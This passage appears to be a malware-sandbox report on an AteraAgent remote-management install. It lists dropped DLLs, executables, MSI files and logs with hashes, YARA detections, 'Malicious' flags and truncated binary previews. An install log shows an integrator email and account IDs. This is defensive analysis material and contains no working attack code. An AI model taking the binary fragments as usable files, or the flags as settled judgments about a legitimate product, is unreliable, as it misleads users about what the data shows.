                                                                                                                                                                                                                                                                          Size (bytes):177704
                                                                                                                                                                                                                                                                          Entropy (8bit):5.814572246989157
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:2DpvOyLSson7aezB53Pbsk4GJCMA1TSuAehuZ7f2lz8/Cvolc3a:2D4y07asBx4krGSegZX3
                                                                                                                                                                                                                                                                          MD5:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          SHA1:2E537E504704670B52CE775943F14BFBAF175C1B
                                                                                                                                                                                                                                                                          SHA-256:847D0CD49CCE4975BAFDEB67295ED7D2A3B059661560CA5E222544E9DFC5E760
                                                                                                                                                                                                                                                                          SHA-512:47228CBDBA54CD4E747DBA152FEB76A42BFC6CD781054998A249B62DD0426C5E26854CE87B6373F213B4E538A62C08A89A488E719E2E763B7B968E77FBF4FC02
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....2g.........."...0................. ........@.. ..............................y.....`.....................................O.......................((..........X................................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H...................,....................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o .....s!...%.o".......o#.....s$..........s%...%......io&...%o'.....o(.......o)...o).....(*...*..0..........r...p... .....r...p.(.....o......(.....o.......(+..........s......[o .....s!...%.o".......o,.......s-..........s%......i.l.....%......io........o)...o)...(.........o/...*..(0...*..{....*"..}....*..{....*"..}....*..{.

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe.config

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):546
                                                                                                                                                                                                                                                                          Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                          MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                                                          SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                                                          SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                                                          SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                                                                                                          Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:WhWbn:WCn
                                                                                                                                                                                                                                                                          MD5:EB053699FC80499A7185F6D5F7D55BFE
                                                                                                                                                                                                                                                                          SHA1:9700472D22B1995C320507917FA35088AE4E5F05
                                                                                                                                                                                                                                                                          SHA-256:BCE3DFDCA8F0B57846E914D497F4BB262E3275F05EA761D0B4F4B778974E6967
                                                                                                                                                                                                                                                                          SHA-512:D66FA39C69D9C6448518CB9F98CBDAD4CE5E93CEEF8D20CE0DEEF91FB3E512B5D5A9458F7B8A53D4B68D693107872C5445E99F87C948878F712F8A79BC761DBF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:version=38.0

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):96808
                                                                                                                                                                                                                                                                          Entropy (8bit):6.1799972918389185
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:UJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762A:UQUm2H5KTfOLgxFJjE50vksVUfPvO1W
                                                                                                                                                                                                                                                                          MD5:E2A9291940753244C88CB68D28612996
                                                                                                                                                                                                                                                                          SHA1:BAD8529A85C32E5C26C907CFB2FB0DA8461407AE
                                                                                                                                                                                                                                                                          SHA-256:6565E67D5DB582B3DE0B266EB59A8ACEC7CDF9943C020CB6879833D8BD784378
                                                                                                                                                                                                                                                                          SHA-512:F07669A3939E3E6B5A4D90C3A5B09CA2448E8E43AF23C08F7A8621817A49F7B0F5956D0539333A6DF334CC3E517255242E572EAEF02A7BBF4BC141A438BF9EB9
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................Y.....`.................................(f..O.......8............R..((...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):704552
                                                                                                                                                                                                                                                                          Entropy (8bit):5.953959038895453
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:/9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc3i:/8m657w6ZBLmkitKqBCjC0PDgM5y
                                                                                                                                                                                                                                                                          MD5:3EF8D12AA1D48DEC3AC19A0CEABD4FD8
                                                                                                                                                                                                                                                                          SHA1:C81B7229A9BD55185A0EDCCB7E6DF3B8E25791CF
                                                                                                                                                                                                                                                                          SHA-256:18C1DDBDBF47370CC85FA2CF7BA043711AB3EADBD8DA367638686DFD6B735C85
                                                                                                                                                                                                                                                                          SHA-512:0FF2E8DBFEF7164B22F9AE9865E83154096971C3F0B236D988AB947E803C1ED03D86529AB80D2BE9FF33AF305D34C9B30082F8C26E575F0979CA9287B415F9F9
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ...............................C....`.....................................O.......................((.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........{...,..................d.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{^....3...{]......(....,...{]...*..{_.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):602672
                                                                                                                                                                                                                                                                          Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                          MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                          SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                          SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                          SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):73264
                                                                                                                                                                                                                                                                          Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                          MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                          SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                          SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                          SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                          C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):216
                                                                                                                                                                                                                                                                          Entropy (8bit):5.200622266873795
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:ASn0KY7T9w3pKFSQFK/YRcaNEjVmKbWQFDX:l0pKMSQUYRjqV9y+X
                                                                                                                                                                                                                                                                          MD5:197CA4D69C5A219DC6BBE5EA6C961CDF
                                                                                                                                                                                                                                                                          SHA1:61A6926D37324320F018D7121CA958283F8E9411
                                                                                                                                                                                                                                                                          SHA-256:62ADA7342F352D847F8D6F8B907A3E4055854DB94A652FD88CA6C0E13C22A78D
                                                                                                                                                                                                                                                                          SHA-512:8F7245C8235087DE499128361795F5C6A3DE7CB1E8CF37B8962F7023E5BCBBAD86F2B840CBF7D21C3013A8E3BA6776528FF36DEBF7FD9D755899C6430CC62E80
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:/i /IntegratorLogin=paul.fraxom@yzistanbul.me /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000Kso2pIAB /AgentId=2094f497-2e94-42f0-b27c-add7e377a9d2.24/11/2024 05:15:37 Trace Starting..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AteraAgent.exe.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2402
                                                                                                                                                                                                                                                                          Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                                                          MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                                                          SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                                                          SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                                                          SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):651
                                                                                                                                                                                                                                                                          Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                          MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                          SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                          SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                          SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

                                                                                                                                                                                                                                                                          C:\Windows\Installer\6c6861.msi

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2994176
                                                                                                                                                                                                                                                                          Entropy (8bit):7.878667520778793
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:N+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:N+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                          MD5:B5B7DD5400C36976C4870AF2F1E888A0
                                                                                                                                                                                                                                                                          SHA1:DBD6FA30F976BAF529D2005D68804EA92327E9BC
                                                                                                                                                                                                                                                                          SHA-256:FD000E4DBD1E3CE1C3604FA0D5FFE235EE676EB2C5AF6CE7334AC69312456708
                                                                                                                                                                                                                                                                          SHA-512:32C5A09388856370E75AA94AD14FA5A074693D2862090C7F72C727569163EA165D69588E53F21220887321C757F097C147FCC3EAD4B4C59FBB171DB06F0D047B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\6c6863.msi

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2994176
                                                                                                                                                                                                                                                                          Entropy (8bit):7.878667520778793
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:N+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:N+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                          MD5:B5B7DD5400C36976C4870AF2F1E888A0
                                                                                                                                                                                                                                                                          SHA1:DBD6FA30F976BAF529D2005D68804EA92327E9BC
                                                                                                                                                                                                                                                                          SHA-256:FD000E4DBD1E3CE1C3604FA0D5FFE235EE676EB2C5AF6CE7334AC69312456708
                                                                                                                                                                                                                                                                          SHA-512:32C5A09388856370E75AA94AD14FA5A074693D2862090C7F72C727569163EA165D69588E53F21220887321C757F097C147FCC3EAD4B4C59FBB171DB06F0D047B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI6A36.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI6A36.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
